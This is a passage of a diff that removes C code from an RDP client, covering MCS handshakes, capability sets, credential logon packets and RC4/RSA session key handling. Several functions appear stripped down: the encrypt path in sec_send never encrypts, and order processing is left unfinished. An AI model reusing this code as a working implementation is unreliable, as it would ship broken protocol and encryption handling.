*/ - in_uint8(s, length); - if (length & 0x80) - in_uint8s(s, 1); /* second byte of length */ - - return s; -} - - - -/* Expect a AUcf message (ASN.1 PER) */ -static BOOL -mcs_recv_aucf(uint16 * mcs_userid) -{ - uint8 opcode, result; - STREAM s; - - s = iso_recv(); - if (s == NULL) - return False; - - in_uint8(s, opcode); - if ((opcode >> 2) != MCS_AUCF) - { - error("expected AUcf, got %d\n", opcode); - return False; - } - - in_uint8(s, result); - if (result != 0) - { - error("AUrq: %d\n", result); - return False; - } - - if (opcode & 2) - in_uint16_be(s, *mcs_userid); - - 
return s_check_end(s); -} - - -/* Expect a CJcf message (ASN.1 PER) */ -static BOOL -mcs_recv_cjcf(void) -{ - uint8 opcode, result; - STREAM s; - - s = iso_recv(); - if (s == NULL) - return False; - - in_uint8(s, opcode); - if ((opcode >> 2) != MCS_CJCF) - { - error("expected CJcf, got %d\n", opcode); - return False; - } - - in_uint8(s, result); - if (result != 0) - { - error("CJrq: %d\n", result); - return False; - } - - in_uint8s(s, 4); /* mcs_userid, req_chanid */ - if (opcode & 2) - in_uint8s(s, 2); /* join_chanid */ - - return s_check_end(s); -} - - -/* Parse a DOMAIN_PARAMS structure (ASN.1 BER) */ -static BOOL -mcs_parse_domain_params(STREAM s) -{ - int length; - - ber_parse_header(s, MCS_TAG_DOMAIN_PARAMS, &length); - in_uint8s(s, length); - - return s_check(s); -} - - -/* Expect a MCS_CONNECT_RESPONSE message (ASN.1 BER) */ -static BOOL -mcs_recv_connect_response(STREAM mcs_data) -{ - uint8 result; - int length; - STREAM s; - - s = iso_recv(); - if (s == NULL) - return False; - - ber_parse_header(s, MCS_CONNECT_RESPONSE, &length); - - ber_parse_header(s, BER_TAG_RESULT, &length); - in_uint8(s, result); - if (result != 0) - { - error("MCS connect: %d\n", result); - return False; - } - - ber_parse_header(s, BER_TAG_INTEGER, &length); - in_uint8s(s, length); /* connect id */ - - mcs_parse_domain_params(s); - - ber_parse_header(s, BER_TAG_OCTET_STRING, &length); - if (length > mcs_data->size) - { - error("MCS data length %d\n", length); - length = mcs_data->size; - } - - in_uint8a(s, mcs_data->data, length); - mcs_data->p = mcs_data->data; - mcs_data->end = mcs_data->data + length; - - return s_check_end(s); -} - - -/* Send an MCS transport data packet */ -void -mcs_send(STREAM s) -{ - uint16 length; - - s_pop_layer(s, mcs_hdr); - length = s->end - s->p - 8; - length |= 0x8000; - - out_uint8(s, (MCS_SDRQ << 2)); - out_uint16_be(s, mcs_userid); - out_uint16_be(s, MCS_GLOBAL_CHANNEL); - out_uint8(s, 0x70); /* flags */ - out_uint16_be(s, length); - - iso_send(s); 
-} - - -/* Send an AUrq message (ASN.1 PER) */ -static void -mcs_send_aurq(void) -{ - STREAM s; - - s = iso_init(1); - - out_uint8(s, (MCS_AURQ << 2)); - - s_mark_end(s); - iso_send(s); -} - - -/* Send a CJrq message (ASN.1 PER) */ -static void -mcs_send_cjrq(uint16 chanid) -{ - STREAM s; - - s = iso_init(5); - - out_uint8(s, (MCS_CJRQ << 2)); - out_uint16_be(s, mcs_userid); - out_uint16_be(s, chanid); - - s_mark_end(s); - iso_send(s); -} - - -/* Send an MCS_CONNECT_INITIAL message (ASN.1 BER) */ -static void -mcs_send_connect_initial(STREAM mcs_data) -{ - int datalen = mcs_data->end - mcs_data->data; - int length = 7 + 3 * 34 + 4 + datalen; - STREAM s; - - s = iso_init(length + 5); - - ber_out_header(s, MCS_CONNECT_INITIAL, length); - ber_out_header(s, BER_TAG_OCTET_STRING, 0); /* calling domain */ - ber_out_header(s, BER_TAG_OCTET_STRING, 0); /* called domain */ - - ber_out_header(s, BER_TAG_BOOLEAN, 1); - out_uint8(s, 0xff); /* upward flag */ - - mcs_out_domain_params(s, 2, 2, 0, 0xffff); /* target params */ - mcs_out_domain_params(s, 1, 1, 1, 0x420); /* min params */ - mcs_out_domain_params(s, 0xffff, 0xfc17, 0xffff, 0xffff); /* max params */ - - ber_out_header(s, BER_TAG_OCTET_STRING, datalen); - out_uint8p(s, mcs_data->data, datalen); - - s_mark_end(s); - iso_send(s); -} - - -/* Send an EDrq message (ASN.1 PER) */ -static void -mcs_send_edrq(void) -{ - STREAM s; - - s = iso_init(5); - - out_uint8(s, (MCS_EDRQ << 2)); - out_uint16_be(s, 1); /* height */ - out_uint16_be(s, 1); /* interval */ - - s_mark_end(s); - iso_send(s); -} - - -/* Process data PDU */ -static void -process_data_pdu(STREAM s) -{ - uint8 data_pdu_type; - - in_uint8s(s, 8); /* shareid, pad, streamid, length */ - in_uint8(s, data_pdu_type); - in_uint8s(s, 3); /* compress_type, compress_len */ - - switch (data_pdu_type) - { - case RDP_DATA_PDU_UPDATE: - process_update_pdu(s); - break; - - case RDP_DATA_PDU_POINTER: - //process_pointer_pdu(s); - break; - - case RDP_DATA_PDU_BELL: - //ui_bell(); - 
break; - - case RDP_DATA_PDU_LOGON: - /* User logged on */ - break; - - } -} - - -/* Respond to a demand active PDU */ -static void -process_demand_active(STREAM s) -{ - uint8 type; - - in_uint32_le(s, rdp_shareid); - - - - rdp_send_confirm_active(); - rdp_send_synchronise(); - rdp_send_control(RDP_CTL_COOPERATE); - rdp_send_control(RDP_CTL_REQUEST_CONTROL); - rdp_recv(&type); /* RDP_PDU_SYNCHRONIZE */ - rdp_recv(&type); /* RDP_CTL_COOPERATE */ - rdp_recv(&type); /* RDP_CTL_GRANT_CONTROL */ - rdp_send_input(0, RDP_INPUT_SYNCHRONIZE, 0, 0, 0); - rdp_send_fonts(1); - rdp_send_fonts(2); - rdp_recv(&type); /* RDP_PDU_UNKNOWN 0x28 */ - reset_order_state(); -} - - -/* Process an order PDU */ -void -process_orders(STREAM s) -{ - RDP_ORDER_STATE *os = &order_state; - uint32 present; - uint16 num_orders; - uint8 order_flags; - int size, processed = 0; - BOOL delta; - - in_uint8s(s, 2); /* pad */ - in_uint16_le(s, num_orders); - in_uint8s(s, 2); /* pad */ - - while (processed < num_orders) - { - in_uint8(s, order_flags); - - if (!(order_flags & RDP_ORDER_STANDARD)) - { - error("order parsing failed\n"); - break; - } - - if (order_flags & RDP_ORDER_SECONDARY) - { - process_secondary_order(s); - } - else - { - if (order_flags & RDP_ORDER_CHANGE) - { - in_uint8(s, os->order_type); - } - - switch (os->order_type) - { - case RDP_ORDER_TRIBLT: - case RDP_ORDER_TEXT2: - size = 3; - break; - - case RDP_ORDER_PATBLT: - case RDP_ORDER_MEMBLT: - case RDP_ORDER_LINE: - size = 2; - break; - - default: - size = 1; - } - - - delta = order_flags & RDP_ORDER_DELTA; - - } - processed++; - } - - if (s->p != next_packet) - error("%d bytes remaining\n", (int) (next_packet - s->p)); -} - - -/* Process a secondary order */ -static void -process_secondary_order(STREAM s) -{ - uint16 length; - uint8 type; - uint8 *next_order; - - in_uint16_le(s, length); - in_uint8s(s, 2); /* flags */ - in_uint8(s, type); - next_order = s->p + length + 7; - s->p = next_order; -} - - -/* Process an update PDU */ 
-static void -process_update_pdu(STREAM s) -{ - uint16 update_type; - - in_uint16_le(s, update_type); - - switch (update_type) - { - case RDP_UPDATE_ORDERS: - process_orders(s); - break; - - case RDP_UPDATE_SYNCHRONIZE: - break; - } -} - - -/* Initialise an RDP packet */ -static STREAM -rdp_init(int maxlen) -{ - STREAM s; - - s = sec_init(encryption ? SEC_ENCRYPT : 0, maxlen + 6); - s_push_layer(s, rdp_hdr, 6); - - return s; -} - -/* Send an RDP packet */ -static void -rdp_send(STREAM s, uint8 pdu_type) -{ - uint16 length; - - s_pop_layer(s, rdp_hdr); - length = s->end - s->p; - - out_uint16_le(s, length); - out_uint16_le(s, (pdu_type | 0x10)); /* Version 1 */ - out_uint16_le(s, (mcs_userid + 1001)); - - sec_send(s, encryption ? SEC_ENCRYPT : 0); -} - -/* Receive an RDP packet */ -static STREAM -rdp_recv(uint8 * type) -{ - static STREAM rdp_s; - uint16 length, pdu_type; - - if ((rdp_s == NULL) || (next_packet >= rdp_s->end)) - { - rdp_s = sec_recv(); - if (rdp_s == NULL) - return NULL; - - next_packet = rdp_s->p; - } - else - { - rdp_s->p = next_packet; - } - - in_uint16_le(rdp_s, length); - /* 32k packets are really 8, keepalive fix */ - if (length == 0x8000) - { - next_packet += 8; - *type = 0; - return rdp_s; - } - in_uint16_le(rdp_s, pdu_type); - in_uint8s(rdp_s, 2); /* userid */ - *type = pdu_type & 0xf; - - - next_packet += length; - return rdp_s; -} - -/* Initialise an RDP data packet */ -static STREAM -rdp_init_data(int maxlen) -{ - STREAM s; - - s = sec_init(encryption ? 
SEC_ENCRYPT : 0, maxlen + 18); - s_push_layer(s, rdp_hdr, 18); - - return s; -} - -/* Send an RDP data packet */ -static void -rdp_send_data(STREAM s, uint8 data_pdu_type) -{ - uint16 length; - - s_pop_layer(s, rdp_hdr); - length = s->end - s->p; - - out_uint16_le(s, length); - out_uint16_le(s, (RDP_PDU_DATA | 0x10)); - out_uint16_le(s, (mcs_userid + 1001)); - - out_uint32_le(s, rdp_shareid); - out_uint8(s, 0); /* pad */ - out_uint8(s, 1); /* streamid */ - out_uint16_le(s, (length - 14)); - out_uint8(s, data_pdu_type); - out_uint8(s, 0); /* compress_type */ - out_uint16(s, 0); /* compress_len */ - - sec_send(s, encryption ? SEC_ENCRYPT : 0); -} - -/* Output a string in Unicode */ -void -rdp_out_unistr(STREAM s, char *string, int len) -{ - int i = 0, j = 0; - - len += 2; - - while (i < len) - { - s->p[i++] = string[j++]; - s->p[i++] = 0; - } - - s->p += len; -} - -/* Parse a logon info packet */ -static void -rdp_send_logon_info(uint32 flags, char *domain, char *user, - char *password, char *program, char *directory) -{ - int len_domain = 2 * strlen(domain); - int len_user = 2 * strlen(user); - int len_password = 2 * strlen(password); - int len_program = 2 * strlen(program); - int len_directory = 2 * strlen(directory); - uint32 sec_flags = encryption ? 
(SEC_LOGON_INFO | SEC_ENCRYPT) : SEC_LOGON_INFO; - STREAM s; - - s = sec_init(sec_flags, 18 + len_domain + len_user + len_password - + len_program + len_directory + 10); - - out_uint32(s, 0); - out_uint32_le(s, flags); - out_uint16_le(s, len_domain); - out_uint16_le(s, len_user); - out_uint16_le(s, len_password); - out_uint16_le(s, len_program); - out_uint16_le(s, len_directory); - rdp_out_unistr(s, domain, len_domain); - rdp_out_unistr(s, user, len_user); - rdp_out_unistr(s, password, len_password); - rdp_out_unistr(s, program, len_program); - rdp_out_unistr(s, directory, len_directory); - - s_mark_end(s); - sec_send(s, sec_flags); -} - -/* Send a control PDU */ -static void -rdp_send_control(uint16 action) -{ - STREAM s; - - s = rdp_init_data(8); - - out_uint16_le(s, action); - out_uint16(s, 0); /* userid */ - out_uint32(s, 0); /* control id */ - - s_mark_end(s); - rdp_send_data(s, RDP_DATA_PDU_CONTROL); -} - -/* Send a synchronisation PDU */ -static void -rdp_send_synchronise(void) -{ - STREAM s; - - s = rdp_init_data(4); - - out_uint16_le(s, 1); /* type */ - out_uint16_le(s, 1002); - - s_mark_end(s); - rdp_send_data(s, RDP_DATA_PDU_SYNCHRONISE); -} - -/* Send a single input event */ -void -rdp_send_input(uint32 time, uint16 message_type, uint16 device_flags, uint16 param1, uint16 param2) -{ - STREAM s; - - s = rdp_init_data(16); - - out_uint16_le(s, 1); /* number of events */ - out_uint16(s, 0); /* pad */ - - out_uint32_le(s, time); - out_uint16_le(s, message_type); - out_uint16_le(s, device_flags); - out_uint16_le(s, param1); - out_uint16_le(s, param2); - - s_mark_end(s); - rdp_send_data(s, RDP_DATA_PDU_INPUT); -} - -/* Send an (empty) font information PDU */ -static void -rdp_send_fonts(uint16 seq) -{ - STREAM s; - - s = rdp_init_data(8); - - out_uint16(s, 0); /* number of fonts */ - out_uint16_le(s, 0x3e); /* unknown */ - out_uint16_le(s, seq); /* unknown */ - out_uint16_le(s, 0x32); /* entry size */ - - s_mark_end(s); - rdp_send_data(s, RDP_DATA_PDU_FONT2); 
-} - -/* Output general capability set */ -static void -rdp_out_general_caps(STREAM s) -{ - out_uint16_le(s, RDP_CAPSET_GENERAL); - out_uint16_le(s, RDP_CAPLEN_GENERAL); - - out_uint16_le(s, 1); /* OS major type */ - out_uint16_le(s, 3); /* OS minor type */ - out_uint16_le(s, 0x200); /* Protocol version */ - out_uint16(s, 0); /* Pad */ - out_uint16(s, 0); /* Compression types */ - out_uint16(s, 0); /* Pad */ - out_uint16(s, 0); /* Update capability */ - out_uint16(s, 0); /* Remote unshare capability */ - out_uint16(s, 0); /* Compression level */ - out_uint16(s, 0); /* Pad */ -} - -/* Output bitmap capability set */ -static void -rdp_out_bitmap_caps(STREAM s) -{ - out_uint16_le(s, RDP_CAPSET_BITMAP); - out_uint16_le(s, RDP_CAPLEN_BITMAP); - - out_uint16_le(s, 8); /* Preferred BPP */ - out_uint16_le(s, 1); /* Receive 1 BPP */ - out_uint16_le(s, 1); /* Receive 4 BPP */ - out_uint16_le(s, 1); /* Receive 8 BPP */ - out_uint16_le(s, 800); /* Desktop width */ - out_uint16_le(s, 600); /* Desktop height */ - out_uint16(s, 0); /* Pad */ - out_uint16(s, 0); /* Allow resize */ - out_uint16_le(s, bitmap_compression ? 1 : 0); /* Support compression */ - out_uint16(s, 0); /* Unknown */ - out_uint16_le(s, 1); /* Unknown */ - out_uint16(s, 0); /* Pad */ -} - -/* Output order capability set */ -static void -rdp_out_order_caps(STREAM s) -{ - uint8 order_caps[32]; - - - memset(order_caps, 0, 32); - order_caps[0] = 1; /* dest blt */ - order_caps[1] = 1; /* pat blt */ - order_caps[2] = 1; /* screen blt */ - order_caps[3] = 1; /* required for memblt? */ - order_caps[8] = 1; /* line */ - order_caps[9] = 1; /* line */ - order_caps[10] = 1; /* rect */ - order_caps[11] = (desktop_save == False ? 
0 : 1); /* desksave */ - order_caps[13] = 1; /* memblt */ - order_caps[14] = 1; /* triblt */ - order_caps[22] = 1; /* polyline */ - order_caps[27] = 1; /* text2 */ - out_uint16_le(s, RDP_CAPSET_ORDER); - out_uint16_le(s, RDP_CAPLEN_ORDER); - - out_uint8s(s, 20); /* Terminal desc, pad */ - out_uint16_le(s, 1); /* Cache X granularity */ - out_uint16_le(s, 20); /* Cache Y granularity */ - out_uint16(s, 0); /* Pad */ - out_uint16_le(s, 1); /* Max order level */ - out_uint16_le(s, 0x147); /* Number of fonts */ - out_uint16_le(s, 0x2a); /* Capability flags */ - out_uint8p(s, order_caps, 32); /* Orders supported */ - out_uint16_le(s, 0x6a1); /* Text capability flags */ - out_uint8s(s, 6); /* Pad */ - out_uint32_le(s, desktop_save == False ? 0 : 0x38400); /* Desktop cache size */ - out_uint32(s, 0); /* Unknown */ - out_uint32_le(s, 0x4e4); /* Unknown */ -} - -/* Output bitmap cache capability set */ -static void -rdp_out_bmpcache_caps(STREAM s) -{ - out_uint16_le(s, RDP_CAPSET_BMPCACHE); - out_uint16_le(s, RDP_CAPLEN_BMPCACHE); - - out_uint8s(s, 24); /* unused */ - out_uint16_le(s, 0x258); /* entries */ - out_uint16_le(s, 0x100); /* max cell size */ - out_uint16_le(s, 0x12c); /* entries */ - out_uint16_le(s, 0x400); /* max cell size */ - out_uint16_le(s, 0x106); /* entries */ - out_uint16_le(s, 0x1000); /* max cell size */ -} - -/* Output control capability set */ -static void -rdp_out_control_caps(STREAM s) -{ - out_uint16_le(s, RDP_CAPSET_CONTROL); - out_uint16_le(s, RDP_CAPLEN_CONTROL); - - out_uint16(s, 0); /* Control capabilities */ - out_uint16(s, 0); /* Remote detach */ - out_uint16_le(s, 2); /* Control interest */ - out_uint16_le(s, 2); /* Detach interest */ -} - -/* Output activation capability set */ -static void -rdp_out_activate_caps(STREAM s) -{ - out_uint16_le(s, RDP_CAPSET_ACTIVATE); - out_uint16_le(s, RDP_CAPLEN_ACTIVATE); - - out_uint16(s, 0); /* Help key */ - out_uint16(s, 0); /* Help index key */ - out_uint16(s, 0); /* Extended help key */ - 
out_uint16(s, 0); /* Window activate */ -} - -/* Output pointer capability set */ -static void -rdp_out_pointer_caps(STREAM s) -{ - out_uint16_le(s, RDP_CAPSET_POINTER); - out_uint16_le(s, RDP_CAPLEN_POINTER); - - out_uint16(s, 0); /* Colour pointer */ - out_uint16_le(s, 20); /* Cache size */ -} - -/* Output share capability set */ -static void -rdp_out_share_caps(STREAM s) -{ - out_uint16_le(s, RDP_CAPSET_SHARE); - out_uint16_le(s, RDP_CAPLEN_SHARE); - - out_uint16(s, 0); /* userid */ - out_uint16(s, 0); /* pad */ -} - -/* Output colour cache capability set */ -static void -rdp_out_colcache_caps(STREAM s) -{ - out_uint16_le(s, RDP_CAPSET_COLCACHE); - out_uint16_le(s, RDP_CAPLEN_COLCACHE); - - out_uint16_le(s, 6); /* cache size */ - out_uint16(s, 0); /* pad */ -} - -static uint8 canned_caps[] = { - 0x01, 0x00, 0x00, 0x00, 0x09, 0x04, 0x00, 0x00, 0x04, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x0C, 0x00, 0x08, 0x00, 0x01, - 0x00, 0x00, 0x00, 0x0E, 0x00, 0x08, 0x00, 0x01, 0x00, 0x00, 0x00, - 0x10, 0x00, 0x34, 0x00, 0xFE, - 0x00, 0x04, 0x00, 0xFE, 0x00, 0x04, 0x00, 0xFE, 0x00, 0x08, 0x00, - 0xFE, 0x00, 0x08, 0x00, 0xFE, - 0x00, 0x10, 0x00, 0xFE, 0x00, 0x20, 0x00, 0xFE, 0x00, 0x40, 0x00, - 0xFE, 0x00, 0x80, 0x00, 0xFE, - 0x00, 0x00, 0x01, 0x40, 0x00, 0x00, 0x08, 0x00, 0x01, 0x00, 0x01, - 0x02, 0x00, 0x00, 0x00 -}; - -/* Output unknown capability set */ -static void -rdp_out_unknown_caps(STREAM s) -{ - out_uint16_le(s, RDP_CAPSET_UNKNOWN); - out_uint16_le(s, 0x58); - - out_uint8p(s, canned_caps, RDP_CAPLEN_UNKNOWN - 4); -} - -/* Send a confirm 
active PDU */ -static void -rdp_send_confirm_active(void) -{ - STREAM s; - uint16 caplen = - RDP_CAPLEN_GENERAL + RDP_CAPLEN_BITMAP + RDP_CAPLEN_ORDER + - RDP_CAPLEN_BMPCACHE + RDP_CAPLEN_COLCACHE + - RDP_CAPLEN_ACTIVATE + RDP_CAPLEN_CONTROL + - RDP_CAPLEN_POINTER + RDP_CAPLEN_SHARE + RDP_CAPLEN_UNKNOWN + 4 /* w2k fix, why? */ ; - - s = rdp_init(14 + caplen + sizeof(RDP_SOURCE)); - - out_uint32_le(s, rdp_shareid); - out_uint16_le(s, 0x3ea); /* userid */ - out_uint16_le(s, sizeof(RDP_SOURCE)); - out_uint16_le(s, caplen); - - out_uint8p(s, RDP_SOURCE, sizeof(RDP_SOURCE)); - out_uint16_le(s, 0xd); /* num_caps */ - out_uint8s(s, 2); /* pad */ - - rdp_out_general_caps(s); - rdp_out_bitmap_caps(s); - rdp_out_order_caps(s); - rdp_out_bmpcache_caps(s); - rdp_out_colcache_caps(s); - rdp_out_activate_caps(s); - rdp_out_control_caps(s); - rdp_out_pointer_caps(s); - rdp_out_share_caps(s); - rdp_out_unknown_caps(s); - - s_mark_end(s); - rdp_send(s, RDP_PDU_CONFIRM_ACTIVE); -} - - - -/* Process incoming packets */ -void -rdp_main_loop(void) -{ - uint8 type; - STREAM s; - - while ((s = rdp_recv(&type)) != NULL) - { - switch (type) - { - case RDP_PDU_DEMAND_ACTIVE: - process_demand_active(s); - break; - - case RDP_PDU_DEACTIVATE: - break; - - case RDP_PDU_DATA: - process_data_pdu(s); - break; - case 0: - break; - - } - } -} - -/* Establish a connection up to the RDP layer */ -BOOL -rdp_connect(char *server, uint32 flags, char *domain, char *password, - char *command, char *directory) -{ - if (!sec_connect(server)) - return False; - - rdp_send_logon_info(flags, domain, username, password, command, directory); - return True; -} - -/* Disconnect from the RDP layer */ -void -rdp_disconnect(void) -{ - sec_disconnect(); -} - - - -/* Reset order state */ -void -reset_order_state(void) -{ - memset(&order_state, 0, sizeof(order_state)); - order_state.order_type = RDP_ORDER_PATBLT; -} - - -static void -reverse(uint8 * p, int len) -{ - int i, j; - uint8 temp; - - for (i = 0, j = len - 1; i < 
j; i++, j--) - { - temp = p[i]; - p[i] = p[j]; - p[j] = temp; - } -} - - -/* - * General purpose 48-byte transformation, using two 32-byte salts (generally, - * a client and server salt) and a global salt value used for padding. - * Both SHA1 and MD5 algorithms are used. - */ -void -sec_hash_48(uint8 * out, uint8 * in, uint8 * salt1, uint8 * salt2, uint8 salt) -{ - uint8 shasig[20]; - uint8 pad[4]; - SHA_CTX sha; - MD5_CTX md5; - int i; - - for (i = 0; i < 3; i++) - { - memset(pad, salt + i, i + 1); - - SHA1_Init(&sha); - SHA1_Update(&sha, pad, i + 1); - SHA1_Update(&sha, in, 48); - SHA1_Update(&sha, salt1, 32); - SHA1_Update(&sha, salt2, 32); - SHA1_Final(shasig, &sha); - - MD5_Init(&md5); - MD5_Update(&md5, in, 48); - MD5_Update(&md5, shasig, 20); - MD5_Final(&out[i * 16], &md5); - } -} - -/* - * Weaker 16-byte transformation, also using two 32-byte salts, but - * only using a single round of MD5. - */ -void -sec_hash_16(uint8 * out, uint8 * in, uint8 * salt1, uint8 * salt2) -{ - MD5_CTX md5; - - MD5_Init(&md5); - MD5_Update(&md5, in, 16); - MD5_Update(&md5, salt1, 32); - MD5_Update(&md5, salt2, 32); - MD5_Final(out, &md5); -} - -/* Reduce key entropy from 64 to 40 bits */ -static void -sec_make_40bit(uint8 * key) -{ - key[0] = 0xd1; - key[1] = 0x26; - key[2] = 0x9e; -} - -/* Generate a session key and RC4 keys, given client and server randoms */ -static void -sec_generate_keys(uint8 * client_key, uint8 * server_key, int rc4_key_size) -{ - uint8 session_key[48]; - uint8 temp_hash[48]; - uint8 input[48]; - - /* Construct input data to hash */ - memcpy(input, client_key, 24); - memcpy(input + 24, server_key, 24); - - /* Generate session key - two rounds of sec_hash_48 */ - sec_hash_48(temp_hash, input, client_key, server_key, 65); - sec_hash_48(session_key, temp_hash, client_key, server_key, 88); - - /* Store first 16 bytes of session key, for generating signatures */ - memcpy(sec_sign_key, session_key, 16); - - /* Generate RC4 keys */ - 
sec_hash_16(sec_decrypt_key, &session_key[16], client_key, server_key); - sec_hash_16(sec_encrypt_key, &session_key[32], client_key, server_key); - - if (rc4_key_size == 1) - { - - sec_make_40bit(sec_sign_key); - sec_make_40bit(sec_decrypt_key); - sec_make_40bit(sec_encrypt_key); - rc4_key_len = 8; - } - else - { - - rc4_key_len = 16; - } - - /* Save initial RC4 keys as update keys */ - memcpy(sec_decrypt_update_key, sec_decrypt_key, 16); - memcpy(sec_encrypt_update_key, sec_encrypt_key, 16); - - /* Initialise RC4 state arrays */ - RC4_set_key(&rc4_decrypt_key, rc4_key_len, sec_decrypt_key); - RC4_set_key(&rc4_encrypt_key, rc4_key_len, sec_encrypt_key); -} - -static uint8 pad_54[40] = { - 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, - 54, 54, 54, - 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, 54, - 54, 54, 54 -}; - -static uint8 pad_92[48] = { - 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, - 92, 92, 92, 92, 92, 92, 92, - 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, 92, - 92, 92, 92, 92, 92, 92, 92 -}; - - -/* Transmit secure transport packet */ -void -sec_send(STREAM s, uint32 flags) -{ - int datalen; - - s_pop_layer(s, sec_hdr); - if (!licence_issued || (flags & SEC_ENCRYPT)) - out_uint32_le(s, flags); - - if (flags & SEC_ENCRYPT) - { - flags &= ~SEC_ENCRYPT; - datalen = s->end - s->p - 8; - -#if WITH_DEBUG - DEBUG(("Sending encrypted packet:\n")); - hexdump(s->p + 8, datalen); -#endif - - - } - - mcs_send(s); -} - - -/* Perform an RSA public key encryption operation */ -static void -sec_rsa_encrypt(uint8 * out, uint8 * in, int len, uint8 * modulus, uint8 * exponent) -{ - BN_CTX *ctx; - BIGNUM mod, exp, x, y; - uint8 inr[SEC_MODULUS_SIZE]; - int outlen; - - reverse(modulus, SEC_MODULUS_SIZE); - reverse(exponent, SEC_EXPONENT_SIZE); - memcpy(inr, in, len); - reverse(inr, len); - - ctx = BN_CTX_new(); - BN_init(&mod); - BN_init(&exp); - BN_init(&x); - BN_init(&y); - - 
BN_bin2bn(modulus, SEC_MODULUS_SIZE, &mod); - BN_bin2bn(exponent, SEC_EXPONENT_SIZE, &exp); - BN_bin2bn(inr, len, &x); - BN_mod_exp(&y, &x, &exp, &mod, ctx); - outlen = BN_bn2bin(&y, out); - reverse(out, outlen); - if (outlen < SEC_MODULUS_SIZE) - memset(out + outlen, 0, SEC_MODULUS_SIZE - outlen); - - BN_free(&y); - BN_clear_free(&x); - BN_free(&exp); - BN_free(&mod); - BN_CTX_free(ctx); -} - -/* Initialise secure transport packet */ -STREAM -sec_init(uint32 flags, int maxlen) -{ - int hdrlen; - STREAM s; - - if (!licence_issued) - hdrlen = (flags & SEC_ENCRYPT) ? 12 : 4; - else - hdrlen = (flags & SEC_ENCRYPT) ? 12 : 0; - s = mcs_init(maxlen + hdrlen); - s_push_layer(s, sec_hdr, hdrlen); - - return s; -} - - - - -/* Output connect initial data blob */ -static void -sec_out_mcs_data(STREAM s) -{ - int hostlen = 2 * strlen(hostname); - - if (hostlen > 30) - hostlen = 30; - - out_uint16_be(s, 5); /* unknown */ - out_uint16_be(s, 0x14); - out_uint8(s, 0x7c); - out_uint16_be(s, 1); - - out_uint16_be(s, (158 | 0x8000)); /* remaining length */ - - out_uint16_be(s, 8); /* length? */ - out_uint16_be(s, 16); - out_uint8(s, 0); - out_uint16_le(s, 0xc001); - out_uint8(s, 0); - - out_uint32_le(s, 0x61637544); /* "Duca" ?! */ - out_uint16_be(s, (144 | 0x8000)); /* remaining length */ - - /* Client information */ - out_uint16_le(s, SEC_TAG_CLI_INFO); - out_uint16_le(s, 136); /* length */ - out_uint16_le(s, 1); - out_uint16_le(s, 8); - out_uint16_le(s, width); - out_uint16_le(s, height); - out_uint16_le(s, 0xca01); - out_uint16_le(s, 0xaa03); - out_uint32_le(s, keylayout); - out_uint32_le(s, 419); /* client build? we are 419 compatible :-) */ - - /* Unicode name of client, padded to 32 bytes */ - rdp_out_unistr(s, hostname, hostlen); - out_uint8s(s, 30 - hostlen); - - out_uint32_le(s, 4); - out_uint32(s, 0); - out_uint32_le(s, 12); - out_uint8s(s, 64); /* reserved? 
4 + 12 doublewords */ - - out_uint16_le(s, 0xca01); - out_uint16(s, 0); - - /* Client encryption settings */ - out_uint16_le(s, SEC_TAG_CLI_CRYPT); - out_uint16_le(s, 8); /* length */ - out_uint32_le(s, encryption ? 0x3 : 0); /* encryption supported, 128-bit supported */ - s_mark_end(s); -} - -/* Parse a public key structure */ -static BOOL -sec_parse_public_key(STREAM s, uint8 ** modulus, uint8 ** exponent) -{ - uint32 magic, modulus_len; - - in_uint32_le(s, magic); - if (magic != SEC_RSA_MAGIC) - { - error("RSA magic 0x%x\n", magic); - return False; - } - - in_uint32_le(s, modulus_len); - if (modulus_len != SEC_MODULUS_SIZE + SEC_PADDING_SIZE) - { - error("modulus len 0x%x\n", modulus_len); - return False; - } - - in_uint8s(s, 8); /* modulus_bits, unknown */ - in_uint8p(s, *exponent, SEC_EXPONENT_SIZE); - in_uint8p(s, *modulus, SEC_MODULUS_SIZE); - in_uint8s(s, SEC_PADDING_SIZE); - - return s_check(s); -} - -/* Parse a crypto information structure */ -static BOOL -sec_parse_crypt_info(STREAM s, uint32 * rc4_key_size, - uint8 ** server_random, uint8 ** modulus, uint8 ** exponent) -{ - uint32 crypt_level, random_len, rsa_info_len; - uint16 tag, length; - uint8 *next_tag, *end; - - in_uint32_le(s, *rc4_key_size); /* 1 = 40-bit, 2 = 128-bit */ - in_uint32_le(s, crypt_level); /* 1 = low, 2 = medium, 3 = high */ - if (crypt_level == 0) /* no encryptation */ - return False; - in_uint32_le(s, random_len); - in_uint32_le(s, rsa_info_len); - - if (random_len != SEC_RANDOM_SIZE) - { - error("random len %d\n", random_len); - return False; - } - - in_uint8p(s, *server_random, random_len); - - /* RSA info */ - end = s->p + rsa_info_len; - if (end > s->end) - return False; - - in_uint8s(s, 12); /* unknown */ - - while (s->p < end) - { - in_uint16_le(s, tag); - in_uint16_le(s, length); - - next_tag = s->p + length; - - switch (tag) - { - case SEC_TAG_PUBKEY: - if (!sec_parse_public_key(s, modulus, exponent)) - return False; - - break; - - case SEC_TAG_KEYSIG: - /* Is this a 
